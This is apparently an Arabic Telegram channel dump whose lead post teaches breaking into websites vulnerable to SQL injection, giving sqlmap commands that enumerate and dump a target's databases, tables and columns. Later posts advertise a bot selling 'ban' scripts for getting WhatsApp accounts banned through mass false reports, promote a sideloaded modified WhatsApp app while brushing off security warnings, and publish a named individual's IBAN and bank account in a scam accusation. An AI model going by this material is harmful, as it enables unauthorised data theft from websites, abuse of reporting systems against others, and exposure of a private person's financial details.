ﭕ﴿ﭕﮩٰٰٰٰﮩٰٰٰٰ﴿ۦۛۦۛۦۛۦۛۦۛ لَوِرأّنَِّسۦۛۦۛۦۛۦۛۦۛ﴾ﮩٰٰٰٰﮩٰٰٰٰٰﭕ﴾ﭕ
____________________
ܔܔܓ ܔܔܓ
اختراق المواقع المصابة بثغرة sql injection
ما هذه الثغرة ؟ سبب حدوثها ؟ مدى خطورتها ؟
ثغرة sql injection
هي من الثغرات التي تعتمد على نوع من قواعد البيانات الذي اسمه mysql
قاعدة البيانات هذه هي من القواعد الخاصة بمواقع الويب
وتحدث الثغرة في ملفات php على الموقع في اغلب الاحيان
مثلا
www.domain.com/news.php?id=1
الملف: news.php
الايدي : 1
ماذا يعني هذا؟
يعني ان news لها عدة صفحات ويب وال id يحدد تلك الصحفة
كيف يحدد الصفحة و news ملف واحد لم يتغير؟
لان news تعتمد على قاعدة البيانات حيث ترسل للداتابيس طلب بمعلومات الصفحة 1 والداتابيس ترسل المعلومات الموجودة في الصفحة 1
ما هو سبب حدوث الثغرة؟
يأتي سبب حدوث هذه الثغرة لعدم برمجة ملف الphp الذي يتحكم بالداتابيس بصورة جيدة وهذا يؤدي الى امكانية حقن الموقع ومعرفة كلمات السر و و .... الخ.
ما مدى خطورتها؟
ان هذه الثغرة خطرة لان يمكن للهاكر الوصول الى قاعدة البيانات التي تحتوي على معلومات المستخدمين و غيرها من البيانات ...
استغلال ثغرة sql injection بأفضل صورة
افضل طريقة لاختراق موقع مصاب ب sql injection عبر اداة sqlmap
ما هي اداة sqlmap؟
ان هذه الاداة من الادوات المشهورة و الاكثر استعمالاً لاختراق المواقع وتحتوي على ميزات اخرى جيدة منها :
• البحث عن مواقع مصابة
• رفع شيل
رابط الاداة :
https://github.com/sqlmapproject/sqlmap
قبل ان تخترق يجب انت تعرف ان :
databases = قواعد البيانات
tables = جداول
columns = أعمدة
الاختراق :
اول امر يستخرج لك قاعدة البيانات
sqlmap -u الامتداد المصاب --dbs
ثاني امر يستخرج لك الجداول من قاعدة البيانات
sqlmap -u الامتداد المصاب -D ( database) --tables
ثالث امر يستخرج لك الأعمدة من الجداول
sqlmap -u الامتداد المصاب -D ( database) -T (table) --columns
رابع امر يستخرج المعلومة التي تريدها من العامود
sqlmap -u الامتداد المصاب -D ( database) -T (table) -C (column) --dump
حول لغيرك يستفيد ?
✅ المـصدر. ✅
?البوت الالكتروني للنشر التلقائي?
كل ماعليك هو ان تجعل البوت مشرف في قناتك فقط لا اكثر
?وسيتم النشر الي قناتك بشكل يومي ?
(@Omvhbot)
?تــــغير مـصدرنا دليك فشلك لانسمح بتغير مصدرنا?
قناة مطور واتساب @O1WhatsA
السلام عليكم ورحمة الله وبركاته اكبر نصاب يشباب تحذير من هذا السارق النصاب الذي ياكل امه حرام يقوم بسرقه وستغلال المساكين اتمنى الحذر منه كل يوم تتطلع قصة عليه اتمنى الابلاغ عليه وين م تحصله على م يقولون الان هو في السعودية لكان نتمنى القبض عليه هناك او اذا كان في اليمن اتمنى القاء القبض عليه
اسمه ?
حنين محمد يحيى يحيى العواض
الايبان حقه
SA22 8000 0475 6080 1660 3918
الحساب
4750000100060866039
يوزر السارق ?
https://t.me/TTT_TTC/34
اتمنى النشر
حول لكي لايقع احد
نزلت لكم بند فنش في البوت البند جديد
@FGPEW24BOT
@FGPEW24BOT
حول لغيرك يستفيد ?
✅ المـصدر. ✅
?البوت الالكتروني للنشر التلقائي?
كل ماعليك هو ان تجعل البوت مشرف في قناتك فقط لا اكثر
?وسيتم النشر الي قناتك بشكل يومي ?
(@Omvhbot)
?تــــغير مـصدرنا دليك فشلك لانسمح بتغير مصدرنا?
قناة مطور واتساب @O1WhatsA
التدريب على الخروج من التقرير
أدخل الروبوت أولاً
@spambot
يصبح
و
يبدأ
ثم عندما يكون في الخيارات، الخيار
لقد كان [خطأ].
طريقة الضرب
التالي
يضرب
نعم
ثم ضرب
[لا! أنا لم تفعل هذا!]
ثم أرسل هذه الرسالة:
عزيزي دعم برقية.
لقد تعرض حسابي على Telegram للبريد العشوائي فجأة ولا أستطيع ذلك
أرسل رسالة إلى أي جهة اتصال لا أملك رقمها إذا كنت أنا من بدأ الدردشة.
يرجى المساعدة في حل المشكلة وإزالة تقرير البريد العشوائي.
أطيب التحيات.
بعد ما يقرب من نصف ساعة من التقرير
انت ترغب
حول لغيرك يستفيد ?
✅ المـصدر. ✅
?البوت الالكتروني للنشر التلقائي?
كل ماعليك هو ان تجعل البوت مشرف في قناتك فقط لا اكثر
?وسيتم النشر الي قناتك بشكل يومي ?
(@Omvhbot)
?تــــغير مـصدرنا دليك فشلك لانسمح بتغير مصدرنا?
قناة مطور واتساب @O1WhatsA
اشتراك الان ❤️لكي نستمر معكم
⚡️تطبيق فك ارقام واتساب WhatsApp
⚙️اصدار V3
✅اصافة فك الطعن وتم تحديث جميع الثغرات
✅اضافة 54 بريد حق شركة واتساب
✅الشركة ترد عليك غصب عن امها
✅خالي عن المشاكل
✅كلمة السر: عمر الطاهري
⚡️قوة | ⚡️ضمان |امان⚡️|سريع ⚡️|خير ⚡️|
الافضل دايما لسنا الوحدين ولكننا الافضل دايما معكم 12 عام ونحن معكم من التميز والابداع
❌اذا طلعت لك واجه ان التطبيق مضر لاتخف هذا الشي بسبب تطبيق من خارج متجر التطبيق امان 1000٪✅
حول لغيرك يستفيد ?
✅ المـصدر. ✅
?البوت الالكتروني للنشر التلقائي?
كل ماعليك هو ان تجعل البوت مشرف في قناتك فقط لا اكثر
?وسيتم النشر الي قناتك بشكل يومي ?
(@Omvhbot)
?تــــغير مـصدرنا دليك فشلك لانسمح بتغير مصدرنا?
قناة مطور واتساب @O1WhatsA
نـزلت لكم بند فنش الفنش الان شغال البند في البوت البند اخر سلعه
@FGPEW24BOT
@FGPEW24BOT
حول لغيرك يستفيد ?
✅ المـصدر. ✅
?البوت الالكتروني للنشر التلقائي?
كل ماعليك هو ان تجعل البوت مشرف في قناتك فقط لا اكثر
?وسيتم النشر الي قناتك بشكل يومي ?
(@Omvhbot)
?تــــغير مـصدرنا دليك فشلك لانسمح بتغير مصدرنا?
قناة مطور واتساب @O1WhatsA
نــــــزلت لكم بــــــند ? اخر
الناس الي واقف عنده الفنش تستخدم البند الي نزلته الان في البوت
البند داعشي انتهاك ناري ?
يبلع من 7 نسخ البلاغات 25 خارج و25 فوق البند اخر بلاغ حضر وبلاغ ويبلع اعمال ايضاء
والناس الي معه فنش تستخدم البند الي نزلته اول في الموقع
البند الداعشي في البوت ???
@FGPEW24BOT
@FGPEW24BOT
حول لغيرك يستفيد ?
✅ المـصدر. ✅
?البوت الالكتروني للنشر التلقائي?
كل ماعليك هو ان تجعل البوت مشرف في قناتك فقط لا اكثر
?وسيتم النشر الي قناتك بشكل يومي ?
(@Omvhbot)
?تــــغير مـصدرنا دليك فشلك لانسمح بتغير مصدرنا?
قناة مطور واتساب @O1WhatsA
____________________